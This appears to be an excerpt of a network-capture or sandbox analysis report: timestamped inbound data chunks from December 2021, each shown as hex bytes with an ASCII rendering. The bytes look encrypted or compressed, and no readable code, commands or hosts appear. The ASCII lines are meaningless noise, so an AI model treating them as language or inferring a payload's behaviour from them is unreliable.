                                                                                                                                                        2021-12-28 02:24:06 UTC2503INData Raw: be 23 e5 7d 04 4b 26 bb f2 69 d4 43 93 46 ea 7f 56 d0 a9 da 3a 38 ba 20 18 01 db 6a 2f ad 83 16 fe 23 38 ce b1 c0 49 9c 5c b0 bd b9 75 17 30 dc 39 e6 04 1f c2 01 4b 2f 1c 97 49 c0 5a 65 94 c9 08 51 c3 41 8c 7d d8 1d 00 c3 4d c8 3b 26 ea d1 9f 98 c6 a9 79 65 5d dd 54 63 cc dc d4 c1 bd d4 bc a8 3a 94 1c c4 6b 34 16 40 c8 97 9a 91 86 11 5a 85 88 12 fd 3f 88 a7 5b c4 5a e5 3f c4 12 9e 16 5a 38 86 c1 f5 24 df 41 96 1b dc b6 fd 4e 0b 91 25 0c bf 00 ee 70 22 f4 f6 1f 7f dd a6 04 e8 47 87 28 f8 24 1a 72 86 f4 bb 39 e4 69 b4 09 3c 0e e1 85 27 52 5b 1a ce 13 b1 50 8e d2 59 47 fc 5d 01 8d 2f aa b6 7f cb 90 67 ef 17 b0 73 d4 54 ed 0f 56 54 ca cf d1 ac 57 b1 32 fd 91 a1 d6 40 52 05 98 49 2f 6d f0 77 89 9f e1 35 f9 76 c3 1c 13 d8 1c b2 f9 4f 85 08 2e 59 90 22 64 a3 ec
                                                                                                                                                        Data Ascii: #}K&iCFV:8 j/#8I\u09K/IZeQA}M;&ye]Tc:k4@Z?[Z?Z8$AN%p"G($r9i<'R[PYG]/gsTVTW2@RI/mw5vO.Y"d
                                                                                                                                                        2021-12-28 02:24:06 UTC2508INData Raw: b5 96 b8 9d 75 ff a4 52 b2 8a 83 bb c1 fc 53 0c d6 96 32 aa b7 89 3f 1f 54 ca 3b 72 8f 4b ef c6 3e 63 f4 01 2d 83 c9 c1 27 21 c5 15 73 89 ab 54 d6 d0 d7 8e 42 5d 97 b0 cc f6 35 68 d8 5b bc 4a 8c 77 ac 9f 41 d7 82 05 49 b9 0d c4 e0 73 0d 6b 70 fb 45 09 c7 ae 3a b0 bf d1 f4 67 e5 95 bd 7d ad a5 78 4b d2 55 41 0e 2c 17 2f 6c 68 e9 87 da d2 8a ec 0d f1 94 36 72 b9 70 1e 7f 53 22 bc d8 6c f9 79 ec 41 13 a4 6d c6 66 85 d6 5e d7 cf 23 a2 34 98 33 96 66 c5 20 b3 f5 b6 ed 8d 13 bf a7 c6 33 c4 11 c6 60 d5 4d cc d9 80 d5 be 75 ef 95 5c d9 c2 00 bc 81 76 b9 66 fa 7a 4c 4c 31 40 91 5f 10 f4 f6 ff c4 1e 46 51 e5 c1 e2 f3 7e da 42 ff 53 b9 7f 74 e9 a1 f9 bd c3 de fb 1a 42 db 79 96 8c 2f 41 64 29 9f f1 ce 27 9c 2f aa 83 62 45 b4 0b 55 4a 63 9b 73 47 b6 20 f8 aa ab 91 ee
                                                                                                                                                        Data Ascii: uRS2?T;rK>c-'!sTB]5h[JwAIskpE:g}xKUA,/lh6rpS"lyAmf^#43f 3`Mu\vfzLL1@_FQ~BStBy/Ad)'/bEUJcsG
                                                                                                                                                        2021-12-28 02:24:06 UTC2511INData Raw: 4a d7 ec b2 ab 4a 3c 7f 1b c9 17 74 d8 a6 f9 73 a9 d9 bc 5a 9f 20 be 5c a9 f5 f0 44 db 9d 8f 58 38 23 73 da 2e 69 fc 6d f6 14 33 e8 58 d5 dc b7 8d 6e f3 4c 68 38 36 f5 18 6a b8 5a 37 cc 0b 2f ab 0c 50 7c 67 de c0 31 43 76 d0 8f ec 43 db 6c f3 12 6b 57 ff d0 8b 30 bd 40 f2 dd 15 3c 4b 1a b7 84 cf b2 d2 f4 79 ac b9 9f 63 80 81 98 db ce 4d 03 69 72 49 5c 82 99 c2 6a ff 81 d3 b0 d6 fb 96 16 8a 5d 4a 3f 2f 90 f0 32 b8 b4 46 ef 4c 65 ed d0 65 52 81 b1 96 4b 12 a4 80 29 36 ed 74 26 9f 91 64 bd f6 41 16 11 c8 3d 3b 9e f2 2c 07 a0 35 66 9d 07 f4 06 b4 95 22 4d 29 a5 7a 41 04 b9 a9 ff 93 02 fb 57 7e aa 49 53 9b 45 fc 61 59 f5 81 01 4b b5 f7 5d 02 83 e4 73 16 01 b8 61 ba 4d 27 e5 5a d7 9e c9 91 e3 c2 b8 24 e7 70 18 ca a7 7a 74 68 82 26 4a 1a 39 90 c6 6c b2 86 20 0b
                                                                                                                                                        Data Ascii: JJ<tsZ \DX8#s.im3XnLh86jZ7/P|g1CvClkW0@<KycMirI\j]J?/2FLeeRK)6t&dA=;,5f"M)zAW~ISEaYK]saM'Z$pzth&J9l
                                                                                                                                                        2021-12-28 02:24:06 UTC2515INData Raw: 81 f9 31 38 e9 f2 a7 fc 44 72 b1 0d 6c 14 e8 21 7a fe d6 a2 61 74 d7 8a 1c 95 4d bf 9c d3 f6 fb fc 90 83 5a 62 f5 ec 35 69 ee b1 58 46 fe ff 55 25 93 57 4f 5e fd 49 07 0c 47 3a 03 1b 9e f8 77 d1 7a 67 e6 c8 b2 be f6 71 1a e6 33 15 e8 e7 be 42 45 d6 07 a3 aa a8 a2 fe a5 d2 70 ff d2 0f df 94 0f 9b cd 87 47 98 0b 00 2a 89 dc 59 56 3f 0d 5c 20 9a ed 0b df 13 56 3f 3b a5 83 72 d2 9d ee 16 e7 06 9a 20 06 d1 6f ef 93 89 36 e6 91 72 85 fd b2 55 55 7f e2 60 da d9 6c d1 b6 b1 e0 fd 1e ac e5 26 86 7c 41 2c 35 dd 7b cd cb c4 9e c0 2c b5 b5 d2 ae 8e ca 7b ff c4 ef 73 06 23 16 c7 8b c5 10 49 34 69 dc 3f 72 4b 70 f7 f1 28 60 73 56 d0 5d 4d 97 f9 df 15 40 d3 c1 53 a0 f4 8a 49 7a 4f eb ab 8e 60 0f 7b 6d d0 30 6f 5a 37 c0 e6 2e 44 e4 b7 b9 7a 9e 39 02 3a a1 9a 72 97 52 ab
                                                                                                                                                        Data Ascii: 18Drl!zatMZb5iXFU%WO^IG:wzgq3BEpG*YV?\ V?;r o6rUU`l&|A,5{,{s#I4i?rKp(`sV]M@SIzO`{m0oZ7.Dz9:rR
                                                                                                                                                        2021-12-28 02:24:06 UTC2519INData Raw: 05 fd 9f 0c ba 80 c4 2b c7 20 b7 70 bd 25 58 63 de a8 3c d4 32 fe ac af d4 9e 03 fd 21 b7 7e e7 65 98 70 7a cb 02 ec a8 56 7f 88 07 bd c6 c4 d7 04 ad 5d 1a e1 18 85 53 26 3a 03 96 37 a3 cc 58 e3 a2 34 fd 89 bf 29 4f 1b 53 a4 12 34 3e 95 2c 8c b6 7e bd 6e 1a 6e 9b 30 17 ba 95 a8 07 52 68 be 9e c8 be f5 52 ec 26 d0 3a 5a ec 8e e0 02 e6 ba 60 cc 75 ea bc a8 b1 bc cf 81 08 54 62 97 be df ec 8d 22 48 bd 62 b4 65 dc d5 4f e7 9e 13 29 bf 65 ba 5e 96 67 1e a6 e5 a4 db 7f 6e 7a 53 97 1a 2e 21 d1 fa 56 ef 75 82 0b 61 7c 96 fb a3 b9 83 c4 de bb 9f f6 5e 50 b6 aa e2 bd 5b 5f 26 8e d2 d9 d8 9f cf f5 ad fb a1 39 9e 67 6e 84 d1 fe 41 42 d0 1f 07 ee 56 a3 c8 09 38 b8 f6 7a c1 d8 58 2e d2 c9 26 6a 04 a1 6b 4d d4 3b bf 61 8c 6f 83 5a de a7 71 c4 7f 30 05 0b 4c 52 7a 2d a9
                                                                                                                                                        Data Ascii: + p%Xc<2!~epzV]S&:7X4)OS4>,~nn0RhR&:Z`uTb"HbeO)e^gnzS.!Vua|^P[_&9gnABV8zX.&jkM;aoZq0LRz-
                                                                                                                                                        2021-12-28 02:24:06 UTC2523INData Raw: 9b 11 28 e4 4f 78 26 72 f7 34 80 b7 12 4a de 6c ac b1 49 72 f9 78 b9 99 0a 8f 99 d9 5c a5 cb 0b fd f8 6d bd 68 47 7f e4 c2 68 1f 39 e3 86 09 3e 10 da 14 ba 8f a4 9f ae 3a af 0d ef ad 2b cc 24 db 74 6f b7 8b 28 83 43 d9 80 f7 7d 53 6d 70 f1 b5 da 5e 84 c1 99 24 88 5c 21 4e 7c 53 19 16 86 b6 96 08 51 b0 1b 4a 24 2a 1b b9 f5 ce cf cb 97 22 e6 38 cb 3a 4a ee 1e ca b8 95 ca 27 eb 3e b5 d5 91 cd aa 0a 21 14 65 3d 06 ba 0b 49 20 33 b0 84 71 20 2d a5 43 52 5f 12 18 af 30 24 99 79 a0 ad c8 a2 0c 9a c8 32 08 ea 0a dc 04 f7 85 6e 18 39 af 54 93 14 12 63 58 e3 2a f4 7c a5 96 b1 c9 67 10 de 88 98 ec 86 4f 1e 77 93 80 ee 07 ba 05 68 46 da 78 0e 77 34 f2 c4 e2 cd 64 d8 84 37 5f e3 a7 71 e2 de 22 4c 1f 07 6d b3 d2 f0 b6 87 97 51 de e9 2c ee 7a c2 3c c2 e3 6f 22 df b3 24
                                                                                                                                                        Data Ascii: (Ox&r4JlIrx\mhGh9>:+$to(C}Smp^$\!N|SQJ$*"8:J'>!e=I 3q -CR_0$y2n9TcX*|gOwhFxw4d7_q"LmQ,z<o"$
                                                                                                                                                        2021-12-28 02:24:06 UTC2527INData Raw: 61 b8 54 94 ab 9e 5d 29 2a d4 47 7e c4 6c 79 26 6e 30 27 e6 33 7b e2 68 f8 85 2e 91 22 80 34 d4 de 1a 96 43 cb a8 c5 53 81 57 f4 a8 e4 c9 22 57 b1 2f 3b 6b ce 47 0e 9a a3 04 02 c4 6a 4c 73 8d e6 37 11 14 5e 8b 0e 46 4d 8c 8f 51 fa c9 ad 34 98 6d 1d 92 83 5e 5a 27 78 30 1b 2a 11 65 8a 2d 61 5e a8 2b ac a1 94 9d 0d ad c5 f1 ae 3e d9 af 7c 33 60 4b be e4 6c 9c 75 95 31 5e fa b3 ab c7 1a e6 16 0a 23 18 05 75 a3 0b 81 0c 8b 56 1e f1 1f dc c1 8e 59 07 f3 e4 bf 65 a3 b4 c0 b7 6d 56 ba 95 e2 93 d4 db eb 24 b8 cf 95 77 77 43 d4 9c b5 44 c4 7f 7b f2 74 e8 ef ab e1 96 4e bb 61 0b 3d 18 3f 07 f3 2d 58 a2 1c ed b0 fa bd f0 55 9d de 15 bf b7 2c 6c e4 4d 62 d5 88 1b e8 09 57 96 f1 ca 2b e9 53 fd ce ed 17 72 55 2b b2 d8 a3 e4 39 83 8a 3a 9a f4 33 d0 c2 6b 05 21 0a b1 2b
                                                                                                                                                        Data Ascii: aT])*G~ly&n0'3{h."4CSW"W/;kGjLs7^FMQ4m^Z'x0*e-a^+>|3`Klu1^#uVYemV$wwCD{tNa=?-XU,lMbW+SrU+9:3k!+
                                                                                                                                                        2021-12-28 02:24:06 UTC2531INData Raw: fd 8d b7 e1 4f a3 d9 7b 2e 98 fd 9c 31 34 a8 5f b4 c8 35 84 c2 a1 41 1a 0f 45 2c dc 62 e6 38 3c ce 10 82 2c 82 6b f1 f8 b6 41 87 97 5a 82 41 61 40 a3 af 11 22 b0 1a 92 17 4d b9 34 fc 64 26 fc 9c cc 92 55 eb 3e d0 3b 1c e0 60 72 e9 00 f1 f1 58 05 dc 81 92 c9 95 6d 9e 22 3c ba 8c 0f 59 94 ba 2b 69 16 ee fe 50 a5 fa a7 2e 89 b9 91 df 94 dc ed 4d 57 94 09 55 67 e0 70 6f 97 5c 04 03 41 95 8d 55 72 e4 cf 9f a0 9a 7e 02 f2 6a 94 39 ed 11 60 24 95 f5 99 ea 3e 86 5d d4 aa 29 f6 55 d7 de ca a0 54 5c bc 92 82 27 eb c9 cf 7e f5 91 cb ec a3 7a 17 8b 4c aa 18 89 a3 46 dc d8 48 d1 2f 17 47 77 b9 67 6d 21 9f da 42 2e df a4 b5 7e 6b 35 e0 1c 22 2c c8 1d ea 27 2b cb 2c a7 f5 7f b7 5c cc c9 c6 0e fb 7d 3c 93 54 b6 c6 49 96 be 30 f9 09 93 7f c7 69 48 71 24 27 99 e3 5e cc 82
                                                                                                                                                        Data Ascii: O{.14_5AE,b8<,kAZAa@"M4d&U>;`rXm"<Y+iP.MWUgpo\AUr~j9`$>])UT\'~zLFH/Gwgm!B.~k5",'+,\}<TI0iHq$'^
                                                                                                                                                        2021-12-28 02:24:06 UTC2535INData Raw: 2b fb d5 31 9d 02 5a e0 ee 2e b7 0b ce 47 35 fc 5b e5 96 69 3b a5 ad 03 f5 ff 05 69 20 8a 41 f5 e5 24 cf 1d 6d 8d f4 a7 fc 2b 8e 3e ac 43 74 b8 3f 60 cf 76 9f 47 c6 81 ba b9 12 7b c7 fb 77 24 41 86 4b 90 4f 4b ee 4e e6 8b d7 e3 38 0f 48 8d 85 f2 06 8a 4b 49 9b c8 7b e8 4b ba 31 f5 e7 22 93 36 91 57 4a 29 f4 06 ed 3b 25 f4 88 f2 d4 c5 db 36 8b fa 91 bd 85 40 ee e3 09 bf c9 45 68 7c 09 7d 4c 13 49 df e4 e8 52 17 c9 cf f1 e4 5f e9 67 bc ca 7c d0 7d f3 fe 18 27 82 62 fb 2b c6 c2 6f a5 b1 43 22 6b a2 1c 22 75 d9 b5 c8 16 c9 e0 50 e1 e0 46 af aa cf bb 35 5e 93 03 57 43 cb 4c 09 10 61 e3 fc f9 88 65 cf e8 3c 0f b6 28 36 00 4d 2c 68 2a a0 7a 8c 6b a0 4a e4 02 91 f6 6a 93 1f f0 95 5d dd f3 83 80 5a a2 7f e1 6e ca 6e 23 01 da 27 d1 d2 5f 7c b1 10 8b ad a0 5e 07 bc
                                                                                                                                                        Data Ascii: +1Z.G5[i;i A$m+>Ct?`vG{w$AKOKN8HKI{K1"6WJ);%6@Eh|}LIR_g|}'b+oC"k"uPF5^WCLae<(6M,h*zkJj]Znn#'_|^
                                                                                                                                                        2021-12-28 02:24:06 UTC2540INData Raw: fb b1 34 9a 99 28 97 29 dd d7 e8 68 1a 70 a8 c9 7c 44 5b dd cd 19 85 4b 73 c1 06 d8 70 16 d2 24 cc f4 d9 5b 9c b0 37 a9 76 e0 3a 15 e0 ca c0 cf ea 15 35 e2 69 ef 3c 59 80 44 3f c1 52 aa 7c a4 bb 82 99 8d c0 c1 a4 12 4d de a5 5e 4c 40 f8 52 81 49 da 82 0d f2 ee c0 0b c9 9f 98 9b 3b 11 8e ba 74 b5 ee b4 61 06 65 9c 2d 8e 44 e1 3c 88 6c 8e 1c b4 7c 20 17 d2 16 dc aa 3c c3 f9 8d 19 1e f8 23 2c b9 9b d6 25 20 1c af 3b b4 ac 78 d0 b6 c6 8a 1d 73 ce bf e8 03 63 ea 1e 00 f2 92 59 ad cc 04 e2 b4 f5 ac a6 e9 3d 78 66 71 4e 1a 2f 85 b3 b2 cf 33 47 8b 2f 0f 2b 13 ff ea 07 b6 5b 47 8c 68 14 04 eb 5f ea f1 d0 ad 89 43 01 2a 9e 6d 0d 61 fe a7 3c 97 1d 76 0b e1 81 22 7e ed 53 64 a4 b7 7b 2e c5 09 94 93 67 11 73 6e 5c cf ce fa 96 03 28 5e e4 49 16 00 d4 52 ac a1 76 0c ec
                                                                                                                                                        Data Ascii: 4()hp|D[Ksp$[7v:5i<YD?R|M^L@RI;tae-D<l| <#,% ;xscY=xfqN/3G/+[Gh_C*ma<v"~Sd{.gsn\(^IRv
                                                                                                                                                        2021-12-28 02:24:06 UTC2543INData Raw: 97 08 8a 7a 79 0a a2 5f 4f 34 9d fa 69 d9 a5 14 e5 a8 19 0e fb 27 59 fe 66 e8 11 f2 0e 29 6b 4e cb ea 41 4a 08 37 33 b2 b2 6d 60 4e f8 b5 bc 18 c5 25 19 8b a0 3e 5c 81 c2 83 14 ad 02 3e 17 f4 a7 59 fe 02 88 79 6c 39 39 f5 07 ce ee 7d 6a c8 5c 65 ff be aa b8 46 c8 78 7e b7 6b 44 0d 32 20 69 39 f8 77 a3 66 88 52 34 9c 5b f6 a9 fa e0 b6 ac 6b dc 55 eb 84 c9 4e 5f db 23 0f 0b 23 61 b9 25 11 4d f1 7f 9c 1d e9 2f 32 4d f0 c6 f5 c6 34 88 7e 13 a4 ac b0 f2 c0 ab 64 34 19 9c 2e d4 9b e2 67 d3 a4 08 0d 80 df dc f8 5c ec 7f 5a 91 1b 02 62 2d 34 35 e6 07 a5 40 e2 66 a6 21 65 a0 45 30 29 2b 28 ab d0 54 57 06 2b 4b ee 6c cf 99 2f 4e 43 d8 a8 c5 c8 3f c1 df 20 be 23 b8 69 f3 87 62 8e 06 db f1 8a 91 6c 79 10 38 65 ab f8 09 5b ff 2a 25 11 25 d2 ab af 91 20 d4 91 38 9f 4b
                                                                                                                                                        Data Ascii: zy_O4i'Yf)kNAJ73m`N%>\>Yyl99}j\eFx~kD2 i9wfR4[kUN_##a%M/2M4~d4.g\Zb-45@f!eE0)+(TW+Kl/NC? #ibly8e[*%% 8K
                                                                                                                                                        2021-12-28 02:24:06 UTC2547INData Raw: cd 73 92 09 17 24 fe e0 f9 c7 4c 77 e0 b4 e9 be 7a da 3b f3 96 ff d0 ed ef c6 1a 4c da d1 d0 27 fc b9 7a 9f 83 34 b5 d5 25 03 86 8a 6a 31 3f b5 50 3e 10 23 63 01 00 ce 65 e6 7d 11 a8 fb 21 49 9f 82 cc a5 7c 79 ae 5c 51 4f e2 4a 0c 35 43 50 fe a1 08 9b 71 30 fd 1c 6b 61 b8 07 ae 0a fe c0 d4 27 18 27 26 58 73 09 7e 22 ef f2 a2 1b 23 95 99 ce b2 8d 50 af 4b 29 23 6e c6 58 f4 cd cc 9f c8 7b e6 d4 eb e2 36 5b b4 a6 6c d4 a9 3f 92 cf 69 42 cd eb d0 4b 51 6c 0d 58 28 84 ec c7 eb 2d d4 52 bd 91 0a 80 df 2e 07 91 b9 f0 0b e4 de 58 e4 74 09 e7 00 15 e0 9d 9a 83 1f fa 34 29 b6 5a 71 fb a9 a9 8b 18 1a ed e8 7f 32 32 99 9e 0a b9 9c 69 a0 d5 7c 42 f9 54 03 83 e6 3a d2 b5 6f fb d7 c7 e9 a9 0b 39 aa 19 e9 6e 1b 17 54 eb 60 07 08 f2 73 4d e5 e8 8c 8c 70 0b 26 96 ae 49 c2
                                                                                                                                                        Data Ascii: s$Lwz;L'z4%j1?P>#ce}!I|y\QOJ5CPq0ka''&Xs~"#PK)#nX{6[l?iBKQlX(-R.Xt4)Zq22i|BT:o9nT`sMp&I
                                                                                                                                                        2021-12-28 02:24:06 UTC2551INData Raw: a6 fd 91 50 53 b7 61 21 d5 f1 8f 29 a4 af 37 8a c0 3a 4a eb 02 00 bf 63 61 12 84 d4 0a 82 ce f2 11 9e 04 2f 40 69 a4 52 e2 04 56 99 65 da b8 e7 80 d3 2f 66 3f e5 40 14 56 32 1f 0b eb 59 f6 8d 1b 78 d4 6f a3 27 4b 89 5b 67 4a 36 38 0e 49 4c 83 07 34 79 b8 3e 06 6a 7b a7 93 86 30 8e 16 f6 a9 0e 0b 77 05 14 ee 2f b2 c1 0c 1d cc c2 12 15 b0 9d 6e fe e4 b0 e6 90 44 fa cb 0e 7c 3a 39 1c 77 8f 3b 41 ff e6 b4 b1 45 b3 76 fe b2 e1 9f dd 87 49 af 91 89 a3 30 65 43 d4 3c a1 96 7c 74 d2 f0 eb fa e0 b9 44 18 41 81 42 c9 9b 7e 07 b5 a7 df aa 9f 20 00 a4 7d a4 58 55 dd 46 f0 95 da 1c 58 1d 78 c9 52 a3 aa 43 1d 6b f1 09 36 0b 49 f1 28 0f cf d1 48 5e 77 37 14 25 b1 9f 61 9f 9b cb 7d 32 f4 49 0d 83 b5 70 a0 df f6 2c 21 46 f1 21 8d 69 76 e8 d7 f4 fa 2d cb b6 e7 fd 87 ea a4
                                                                                                                                                        Data Ascii: PSa!)7:Jca/@iRVe/f?@V2Yxo'K[gJ68IL4y>j{0w/nD|:9w;AEvI0eC<|tDAB~ }XUFXxRCk6I(H^w7%a}2Ip,!F!iv-
                                                                                                                                                        2021-12-28 02:24:06 UTC2555INData Raw: 5e c9 2f e9 5f a8 e7 b2 04 86 d3 85 5e 3f 04 63 f4 ef 9e 45 6d 28 d7 80 cc 77 ef ea 80 60 07 65 af f7 59 e0 47 62 3d fa 2f 70 9f 4c 64 81 ab 1b 2d c9 a8 c6 77 7e 7a 9e 03 3d 3e e7 64 7c 3c 89 8e eb 9e 99 7a 01 0e 44 eb 46 b7 eb 20 2c d4 68 74 61 bb 76 7e da b6 b3 05 d6 16 60 0f 06 9a 29 d5 22 17 47 09 f9 35 b8 f9 d3 e1 c1 13 ab 75 24 aa 40 46 56 76 22 87 9b f8 1e 4d 31 9b 1f 8b 37 41 41 9a b7 d9 38 f2 61 d5 58 b2 44 c8 5b c1 65 27 48 bf d5 e4 88 2a 7f 08 bf 54 0f c8 1f d1 91 ee 93 b0 ef 39 24 57 3d 98 18 cf 2f 7c 3b c1 fd ae a3 07 7f e0 2b bf b5 aa 09 44 68 e3 72 c7 d5 c6 d5 27 a7 19 cf 4f 99 44 f0 71 6b 47 01 1f 9e 1f ee 49 d5 01 09 9e 69 b9 4c a3 9b 17 38 c7 c4 ef e8 c1 04 4c 34 cc 56 6e 2f e2 5b 9b 12 3a e5 49 6e 6b 86 9c e4 76 14 20 88 91 9c e1 41 df
                                                                                                                                                        Data Ascii: ^/_^?cEm(w`eYGb=/pLd-w~z=>d|<zDF ,htav~`)"G5u$@FVv"M17AA8aXD[e'H*T9$W=/|;+Dhr'ODqkGIiL8L4Vn/[:Inkv A
                                                                                                                                                        2021-12-28 02:24:06 UTC2559INData Raw: 44 e1 bc d0 ec e7 43 53 8c 57 cc f0 36 29 5a 15 bb 76 15 80 af 3e 25 1d 5e bc a0 7e b0 d0 8b d8 80 41 f5 69 8a e7 47 9b 5e a3 a1 e9 b2 e1 cc db 76 97 0d 00 75 c1 41 a8 27 99 4b 88 d4 4f 15 94 65 bf ac 40 18 b7 78 a1 28 ab a5 42 79 7a cd 4e 31 45 99 9e a1 9b 43 dc 20 96 38 e2 52 0e d7 8f c0 ff 61 39 31 ab f3 68 5a a3 b3 84 67 a8 b5 2e f9 ce 1d 52 8c 62 84 e9 4b dc 6f ca 80 f6 25 ba e0 f8 d9 fd 90 9e 1f 3e 26 6b c5 e5 ec e3 6d 9b 07 2c 32 95 cd 26 47 0a c6 3d 51 c6 ad f9 13 4e 99 9d 09 9b be ba ad 4e b2 3f 5e 4c f9 4b 89 7e 28 c1 75 7c 2d 2d cc 70 1c db 36 d1 e7 d3 74 28 75 eb 9a 14 dd dc dd bc 09 f6 dc a2 c5 81 d6 ac 61 44 21 68 68 66 99 6a dd c8 4f d2 16 53 b3 fe 51 02 04 47 18 ba 32 f7 0e 8c 20 1c 8c 48 61 de 55 22 5a 78 16 db 33 ca d6 59 05 ea df 9e 22
                                                                                                                                                        Data Ascii: DCSW6)Zv>%^~AiG^vuA'KOe@x(ByzN1EC 8Ra91hZg.RbKo%>&km,2&G=QNN?^LK~(u|--p6t(uaD!hhfjOSQG2 HaU"Zx3Y"
                                                                                                                                                        2021-12-28 02:24:06 UTC2563INData Raw: 5d 57 5e 1a 70 6d f4 e6 17 3f 57 21 8d ab 01 4a fd d1 5f 70 dd d8 9a 6b 33 f7 7b e1 97 b7 12 c0 27 ab 2a b8 f5 b9 07 f4 ba be f7 eb 16 44 e1 ac b8 64 0b de 84 d3 50 32 9f ed be a7 63 c5 46 dc f8 88 14 ff f9 30 5b 89 56 29 99 a9 66 58 fc 70 70 2b b1 b5 10 0a 42 63 de 22 78 fa b1 69 33 5b 78 4d eb 78 cf 0f a6 aa 1d 44 1c c7 5a 5d 7f b0 3a a3 e1 19 65 bf 57 77 97 9d 4a 49 40 27 9e b4 05 5e 9a 80 2e a5 63 f4 ce 3f 0c 6e 94 2d a8 5a 84 ed 71 65 32 38 9b 3c bd 97 5b 63 f1 21 54 3e 9c ef bd ab 40 8c 14 fe 2a 36 65 bd f4 b0 b8 4a f6 21 76 35 cf 07 0e 70 8a c1 64 e3 b2 5a 76 6d 26 c9 e9 7d 62 77 bc a5 48 a3 47 13 48 92 af b4 03 e1 98 2a b7 bc d2 2a d9 29 3b 19 e0 8c 20 3d e4 17 a4 bf 30 26 aa 58 6c e5 90 ac 04 cf bd 8c dc 0f ad dd a1 a7 38 54 c1 e2 93 4c 46 31 98
                                                                                                                                                        Data Ascii: ]W^pm?W!J_pk3{'*DdP2cF0[V)fXpp+Bc"xi3[xMxDZ]:eWwJI@'^.c?n-Zqe28<[c!T>@*6eJ!v5pdZvm&}bwHGH**); =0&Xl8TLF1
                                                                                                                                                        2021-12-28 02:24:06 UTC2567INData Raw: 79 73 05 26 30 97 6c e6 75 0a fb 9b 8d e6 02 68 68 35 44 46 2a 3a 8d 8e 75 8a 54 ab 8e 12 d2 7a 60 f6 6b 64 99 2a bb d6 b1 b9 a4 7e 54 a7 a6 58 40 ae 83 90 61 1e 84 a3 59 43 ac 16 ef 4b 39 78 7c 63 c4 61 9a 15 20 3c f1 17 8d 37 fe 38 09 4e 67 00 b1 02 c1 a5 79 72 9e 8d 60 47 4a 24 e8 de b2 da e1 51 c5 75 37 a8 f9 28 fe e5 23 b8 6b 96 0b ee 8e ed c0 c8 fe e9 7a 23 f8 0a 72 3c aa 22 eb 9e d3 eb 7d 32 3c d5 88 ca 12 88 9c db 44 30 2a 9e 70 90 4b 32 3e a0 6e 55 75 52 89 9e e1 7e 40 5b dd 6d 90 19 3b 60 8a 37 95 43 8e a7 c5 d0 f2 8d b6 0d 6e ea 89 8e 8f 75 89 ed 6e 77 4f e9 4f 45 48 7a 99 73 19 2b cc ea af 59 a4 b8 f0 87 c2 4c 7e 37 3e ef 6c 7f 7a 63 3d 94 6d 86 59 37 11 98 68 27 be 29 bf 27 2b 14 02 ec 33 1f 3c 97 c4 6b 99 d7 f9 0a 06 7c 03 de 05 13 bb de af
                                                                                                                                                        Data Ascii: ys&0luhh5DF*:uTz`kd*~TX@aYCK9x|ca <78Ngyr`GJ$Qu7(#kz#r<"}2<D0*pK2>nUuR~@[m;`7CnunwOOEHzs+YL~7>lzc=mY7h')'+3<k|
                                                                                                                                                        2021-12-28 02:24:06 UTC2572INData Raw: 2f 0e 94 c2 be a3 fb b7 fa 82 39 8a 08 5c 14 d2 d5 91 62 b4 b5 d2 93 e6 02 49 ab 6d cf 78 f0 b2 a1 ea 25 e4 e5 87 d2 c5 dc b5 7a 0d c4 77 78 34 dc 89 26 f0 92 ae 17 4f 75 0e 09 55 c7 41 d5 81 ea a5 d1 32 b6 9b 5e ce e8 8e a1 8b 38 1a d8 48 35 50 8c 26 e3 95 b3 4e f9 25 2c 1c 65 d5 79 33 48 68 d1 4f ed b8 1c ba 54 2a 6d 69 68 5d df 20 32 6b 15 6a cd 91 39 60 89 37 3c 64 6a 25 c3 e7 15 1a c4 18 db 22 86 9a 85 0d ac 7a 6e a7 02 1e cf 59 68 ef c5 25 d7 5e a3 ac 2d 0d 06 d2 c6 7a 92 65 ec a9 1b 8a d5 76 c7 a4 40 d8 39 dc 56 4c 76 d0 17 74 d2 ab 86 05 da 15 9b fb 75 a2 ad 23 9b 89 55 7c fe e6 47 f2 c1 79 ff 69 15 88 5f b9 3e 82 d7 cd d1 ab 5e 0b 21 c0 4e 2b be ce 19 17 b9 7e eb cb 71 e5 50 84 2e 89 78 18 d5 2e d5 af 52 28 09 8c cc 26 a2 1a 11 ed f2 f6 a0 a9 81
                                                                                                                                                        Data Ascii: /9\bImx%zwx4&OuUA2^8H5P&N%,ey3HhOT*mih] 2kj9`7<dj%"znYh%^-zev@9VLvtu#U|Gyi_>^!N+~qP.x.R(&
                                                                                                                                                        2021-12-28 02:24:06 UTC2575INData Raw: c1 28 85 b2 a7 1d 4d f2 f8 60 1b 3d 3e c1 c1 0c a8 9c a5 7f 99 13 96 fc 3d 34 1e 41 d3 50 a8 c1 fa 8b a4 5d d6 52 b5 bd 7d 8b 19 b7 c0 e8 81 31 3a 2a 27 d0 6e 8a 0a 08 de dd 95 61 6c 1d ed dc 79 ed 60 ef 56 77 8e 6c a0 1f 25 2c 5b 85 5c cd b4 c5 bf e1 aa a2 ee 16 53 54 17 13 7a 98 74 d6 06 5e 03 6a 98 74 09 eb 5a 1a 33 ee b1 a4 a4 e4 77 20 90 20 8a c7 6e d9 6a 9d d7 3a fb 0c e9 0a 02 3d 6a c7 ea 73 4e 77 a0 e4 79 0f 0c ae 1d 49 48 d2 09 16 a1 73 3c 21 9c 08 b7 06 4b 2b 6f 48 e7 35 03 58 e6 5f 2a d8 4e 4f ae b9 30 d5 0e 9f ab 10 a5 f6 0f 12 7f 20 13 9d 03 34 0a 3a 54 0f 58 08 e3 17 a7 17 c6 a1 19 1a 2e 48 97 fb 0d 1a e3 e5 a7 90 ec 12 0e 05 df cf 8c 6f e8 ad d9 98 f1 6d b4 6a 83 89 1b 18 82 2c 3e e8 06 6b 35 8b 3e d1 7c 33 53 be 6b 82 6a 9b da 2d 6c 06 8d
                                                                                                                                                        Data Ascii: (M`=>=4AP]R}1:*'naly`Vwl%,[\STzt^jtZ3w nj:=jsNwyIHs<!K+oH5X_*NO0 4:TX.Homj,>k5>|3Skj-l
